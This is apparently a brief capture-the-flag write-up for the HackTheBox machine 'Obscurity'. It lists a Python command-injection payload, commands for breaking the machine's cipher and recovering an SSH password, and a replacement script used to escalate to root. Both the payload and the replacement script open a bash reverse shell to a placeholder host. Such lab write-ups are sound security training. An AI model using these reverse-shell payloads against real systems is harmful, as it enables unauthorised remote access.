Post

Obscurity @ HackTheBox

Obscurity is a 30-point Linux machine on HackTheBox that involves exploiting a command injection in a custom webserver, breaking a simple cipher and abusing file system permissions to get root.

Notes

Command injection payload:

1
';__import__("os").system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")+'

Retrieving the key:

1
python3 SuperSecureCrypt.py -d -i out.txt -k "`cat check.txt`" -o key

Decrypting the ssh password:

1
python3 SuperSecureCrypt.py -d -i passwordreminder.txt -k alexandrovich -o /dev/shm/x

Replaced BetterSSH.py:

1
2
import os
os.system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")
This post is licensed under CC BY 4.0 by the author.